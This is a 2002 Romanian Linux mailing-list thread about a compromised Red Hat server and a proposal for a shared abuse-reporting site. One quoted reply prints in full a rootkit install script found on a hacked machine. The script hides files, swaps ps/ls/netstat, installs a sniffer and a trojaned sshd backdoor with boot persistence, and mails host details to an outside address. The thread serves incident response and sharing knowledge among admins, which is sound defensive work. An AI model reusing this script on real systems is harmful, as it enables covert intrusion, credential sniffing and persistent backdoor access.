Aici as putea ajuta si eu, insa, poate sunt altii mai priceputi printre noi :). Oricum, ideea este buna, vreau sa ajut.
On Sat, May 25, 2002 at 09:06:08PM +0300, Catalin Catana wrote: > /me se ofera sa ajute la engine-ul site-ului daca e vorba de php+mysql > poate si postgresql. > > Baba Bogdan said: > > ofer eu hosting > > T1 -SUA QWEST.NET > > > > > > > > On Sat, 25 May 2002, Petre Daniel wrote: > > > >> ideea e excelenta.vorbitzi prea mult pe lista,parerea mea. > >> votatzi un site central (cine se ofera cu hosting) eu n-am prea multa > >> banda,dar ofer domeniu. > >> cine se pricepe la php&db sa seteze un mic engine pe site.se inscriu > >> adminii cu adresele lor shi trimit mailuri cu loguri grepuite frumos > >> la adresa centrala care sorteaza shi pune pe web cine ataca shi unde. > >> deshi sunt contracte la mijloc shi destul de multe interese,eu unul > >> daca vad pe www.abuse.ro ca de la ipul 194.102.92.x s-au facut > >> attempturi sau incercari de exploatare a serviciilor lu gushteru sau > >> gagiului ala care-shi tzine un cafe shi el cu greu,ori firmei XXX > >> serioase,fac ceva ca sa vad cine din retzea mea face prostioare shi > >> daca e posibil sa scap de el. mi se pare aiurea sa permitem unor > >> pushti sa se joace cu serverele shi sa foloseasca abuziv banda. > >> informatzia e cea mai puternica shi daca ne putem oferi unii altora > >> informatzie valoroasa eu zic s-o facem odata. > >> loguri am shi eu destul,m-au atacat destui,dar m-am descurcat singur > >> pentru ca nu shtiu unde-ash putea reclama shi ce s-ar putea face. > >> de ce sa nu ne ajutam ca admini cand o putem face ? > >> bla bla. > >> haidetzi odata. > >> > >> Petre L. Daniel,System Administrator > >> Canad Systems Pitesti Romania > >> Tel:+4048206200,+4048220044 > >> http://www.cyber.ro > >> > >> t 05:35 PM 5/25/02 -0700, you wrote: > >> >Hello Petre, > >> > > >> >Saturday, May 25, 2002, 5:14:28 PM, you wrote: > >> > > >> >PD> 2 mbps cu abuse.zone.ro sa zicem.. > >> > > >> >sa vedem intai ca exista interes din partea "target-ului" :) > >> > > >> >Gusherul > >> > > >> >PD> /me > >> > > >> >PD> At 01:08 PM 5/25/02 -0700, you wrote: > >> > >>Hello paul, > >> > >> > >> > >>Un lucru tot e bun. Ca mi-ai zis adresa de mail. Care mai are > >> > >>rootkituri sariti cu emailurile unde se duc info despre server. > >> > >>Asha mai scapam de ei oleak:) > >> > >> > >> > >>Gushterul > >> > >>P.S. Hapropo ce-ar fi o pagina de web cu toti? Nu sa punem rk > >> > >>acolo ci info sha shthie homu' lha khare sha hai dhea in khap. > >> > >>Reformulez cine face hosting? :) > >> > >> > >> > >>Friday, May 24, 2002, 11:38:02 PM, you wrote: > >> > >> > >> > >>pzeur> Reinstall tot dupa care te inregistrezi cu rhn_register la > >> > >>rh network si > >> > >>pzeur> dupa ce ai inscris sitemul tau la ei poti folosi "up2date > >> > >>-u" pentru pzeur> update-uri la zi. Seamana a wingoz dar merge > >> > >>bine. > >> > >>pzeur> Daca ai probleme cu conexiunea il lasi sa aduca headerele, > >> > >>pe > >> > care le > >> > >>pzeur> pune in /var/spool/up2date, (ai de downloadat vreo 200 mb > >> > >>de > >> > updateuri) > >> > >>pzeur> cauta un mirror apropiat la updates.redhat.com (ex: > >> > >>ftp.ubbcluj.ro) aduci > >> > >>pzeur> de acolo pachetele corespunzatoare headerelor pe care le > >> > >>pui in pzeur> /var/spool/up2date si repornesti "up2date -u". > >> > >> > >> > >> > >> > >>pzeur> si mie mi-a gaurit wu-ftpd-u din rh7.2 dar rootkitu era > >> > >>pentru alt sistem > >> > >>pzeur> asa ca l-am gasit dupa vreo 3 ore (asteptam sa se termine > >> > >>"up2date -u" cu > >> > >>pzeur> serviciile pornite de bou ce am fost:) cind ps, ls , > >> > >>netstat nu mergeau. > >> > >>pzeur> asa ca am adus repede respectivele app de pe alt sistem, si > >> > surpriza... > >> > >>pzeur> nfsd -q -p 50000 care era un sshd modificat. m-am uitat > >> > >>prin > >> > directoare > >> > >>pzeur> si am gasit in /var/ftp/ un director care nu era acolo > >> > >>ultima data cind m-am > >> > >>pzeur> uitat. Cautind prin fisierele din el dau de o cale la ceva > >> > director de > >> > >>pzeur> librarii unde era cam asa ceva: > >> > >>pzeur> . > >> > >>pzeur> .. > >> > >>pzeur> .lib > >> > >>pzeur> .tooz > >> > >> > >> > >>pzeur> in .tooz era fisierul install: > >> > >>pzeur> #private version from cur / not hacked by lamme assz as > >> > >>Em|nem or others! > >> > >>pzeur> #phear my reverge all u mother fuckers > >> > >>pzeur> # rk made ONLY 4 my friends ond ONLY 4 fun > >> > >>pzeur> #!/bin/sh > >> > >>pzeur> unset HISTFILE > >> > >>pzeur> chattr -iau /usr/src/linux/arch/alpha/lib/.lib/ > >> > >>pzeur> chattr -iau /bin/ps > >> > >>pzeur> chattr -iau /bin/ls > >> > >>pzeur> chattr -iau /bin/netstat > >> > >>pzeur> chattr -iau /bin/lpd > >> > >>pzeur> rm -rf /etc/ssh* > >> > >>pzeur> clear > >> > >>pzeur> mkdir -p /usr/src/linux/arch/alpha/lib/.lib > >> > >>sh sysinfo1 >> new-host > >> > >>pzeur> sh ssh_random_key > >> > >>pzeur> mv .1proc /usr/src/linux/arch/alpha/lib/.lib/ > >> > >>pzeur> mv .1addr /usr/src/linux/arch/alpha/lib/.lib/ > >> > >>pzeur> mv .1file /usr/src/linux/arch/alpha/lib/.lib/ > >> > >>pzeur> mv /bin/ps /usr/src/linux/arch/alpha/lib/.lib/.ps > >> > >>pzeur> mv /bin/ls /usr/src/linux/arch/alpha/lib/.lib/.ls > >> > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1proc > >> > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1addr > >> > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.1file > >> > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ps > >> > >>pzeur> chattr +iau /usr/src/linux/arch/alpha/lib/.lib/.ls > >> > >>pzeur> mv ps /bin/ps > >> > >>pzeur> mv ls /bin/ls > >> > >>pzeur> mv /bin/netstat /usr/src/linux/arch/alpha/lib/.lib/ > >> > >>pzeur> mv netstat /bin/netstat > >> > >>pzeur> chown root.root /bin/ls > >> > >>pzeur> chown root.root /bin/ps > >> > >>pzeur> chown root.root /bin/netstat > >> > >>pzeur> mv linsniffer /bin/lpd > >> > >>pzeur> rm -rf /etc/ssh* > >> > >>pzeur> rm -rf /usr/man/man8/rpc.rstatd.8 > >> > >>pzeur> rm -rf /usr/sbin/rpc.rstatd > >> > >>pzeur> rm -rf /usr/sbin/rpc* > >> > >>pzeur> lpd & > >> > >>pzeur> ./lpd > >> > >>pzeur> mv sshd /bin/nfsd > >> > >>pzeur> mv -f sshd_config /etc/ > >> > >>pzeur> mv -f ssh_host_key /etc/ > >> > >>pzeur> mv -f ssh_random_seed /etc/ > >> > >>pzeur> mv -f ssh_host_key.pub /etc/ > >> > >>pzeur> rm -rf ssh_random_key > >> > >>pzeur> chattr +iau /bin/nfsd > >> > >>pzeur> chattr +iau /etc/sshd_config > >> > >>pzeur> chattr +iau /etc/ssh_host_key > >> > >>pzeur> chattr +iau /etc/ssh_random_seed > >> > >>pzeur> chattr +iau /etc/ssh_host_key.pub > >> > >>pzeur> nfsd -q -p 50000 > >> > >>pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/rc.sysinit > >> > >>pzeur> echo "nfsd -q -p 50000" >>/etc/rc.d/init.d/inet > >> > >>./sysinfo1 >> new-host |mail -s "root6666" [EMAIL PROTECTED] > >> > >>pzeur> cat new-host |mail -s > >> > >>pzeur> #-----done with ssh---- > >> > >>pzeur> killall -9 portmap > >> > >>pzeur> killall rpc.statd > >> > >>pzeur> rm -f /usr/sbin/rpc.statd > >> > >>echo "ftp">>>/etc/ftpusers > >> > >>echo "root">>>/etc/ftpusers > >> > >>pzeur> cat /proc/cpuinfo > >> > >>pzeur> mv pwd /dev/capi20.20 > >> > >>pzeur> rm -f sysinfo1 > >> > >>pzeur> rm -f sysinfo > >> > >>pzeur> rm -f new-host > >> > >>pzeur> rm -f sshd > >> > >>pzeur> cd .. > >> > >>pzeur> rm -rf s.tgz > >> > >>pzeur> clear > >> > >>pzeur> echo > >> > >>"****************************7.1***************************" > >> > >>pzeur> echo "Oki" > >> > >>pzeur> echo > >> > >>"***********************SpUrKaTu&TrUnKS********************" > >> > >> > >> > >> > >> > >>pzeur> mai era un fisier .1addr: > >> > >>pzeur> 2 194.105 > >> > >>pzeur> 3 6666 > >> > >>pzeur> 3 6667 > >> > >>pzeur> 3 54789 > >> > >>pzeur> 3 31337 > >> > >>pzeur> 3 6668 > >> > >>pzeur> 3 6669 > >> > >>pzeur> 3 6666 > >> > >>pzeur> 2 194.102.233 > >> > >>pzeur> 2 209.142.209.161 > >> > >>pzeur> 2 217.10 > >> > >>pzeur> 2 213.233 > >> > >> > >> > >> > >> > >>pzeur> am pastrat fisierele ca poate nu se stie niciodata, mai > >> > >>sunt printre ele : > >> > >>pzeur> hideps install lpd sense string tcp.log utils wipe > >> > >>pzeur> .1addr .1file .1proc .ls netstat .ps > >> > >> > >> > >>pzeur> cam asta ma mai gasit > >> > >> > >> > >>pzeur> in general e bine ai copii originale dupa ls, ps, netstat > >> > >> > >> > >>pzeur> bafta > >> > >> > >> > >> > >> > >>pzeur> On Fri, 24 May 2002, Gabriel Stoicea wrote: > >> > >> > >> > >> >> Rulez un sistem RH 7.2 pe care am depistat o intruziune. Mi-am > >> > >> >> dat seama de asta pentru ca nu mergeau corect anumite comenzi. > >> > >> >> 1. Am reparat pachetele compromise (net-tools, fileutils si > >> > >> >> procps) cu rpm -U --force ... > >> > >> >> 2. Am download-at chkrootkit si chkproc imi spune ca ruleaza 2 > >> > >> >> procese ascunse: > >> > >> >> - You have 1 process hidden for readdir command > >> > >> >> - You have 1 process hidden for ps command > >> > >> >> 3. chkrootkit "intepeneste" la verificare la pozitia > >> > >> >> Checking 'aliens'... > >> > >> >> 4. Cand rebootez PC-ul imi da niste erori la demontarea > >> > >> >> partitiei /usr --> Illegal seek > >> > >> >> 5. Cand bootez imi apar cateva mesaje cum ca un program este > >> > >> >> shareware si nu stiu ce... si ca asculta pe portul 7000 > >> > >> >> 6. In boot.log apare linia > >> > >> >> ... Starting backdoor daemon... Done, pid=... > >> > >> >> Acum va intreb: > >> > >> >> - mai pot fi si alte pachete compromise in afara de cele > >> > >> >> numite? - ce este cu acele procese ascunse si cum scap de ele? > >> > >> >> - de ce intepeneste chkrootkit? > >> > >> >> - daca este intr-adevar vorba de backdoor, cum scap de el? > >> > >> >> > >> > >> >> Cu speranta ca nu va "sictiresc" cu un mail asa de lung, va > >> > >> >> multumesc anticipat pentru ajutor. > >> > >> >> Gaby > >> > > >> >--- > >> >Pentru dezabonare, trimiteti mail la > >> >[EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. > >> >REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ > >> > >> --- > >> Pentru dezabonare, trimiteti mail la > >> [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. > >> REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ > >> > >> > > > > -- > > Baba Bogdan > > > > System Administrator > > CDS NETWORK, Corpus Christi, TX, US > > --------------------------------o0()()0o------------------------------- > > We can forgive a child who is afraid of the dark; the real tragedy of > > life is when men are afraid of the light. > > - Plato > > > > > > --- > > Pentru dezabonare, trimiteti mail la > > [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. > > REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ > > > > --- > Pentru dezabonare, trimiteti mail la > [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. > REGULI, arhive si alte informatii: http://www.lug.ro/mlist/ > > --- Pentru dezabonare, trimiteti mail la [EMAIL PROTECTED] cu subiectul 'unsubscribe rlug'. REGULI, arhive si alte informatii: http://www.lug.ro/mlist/
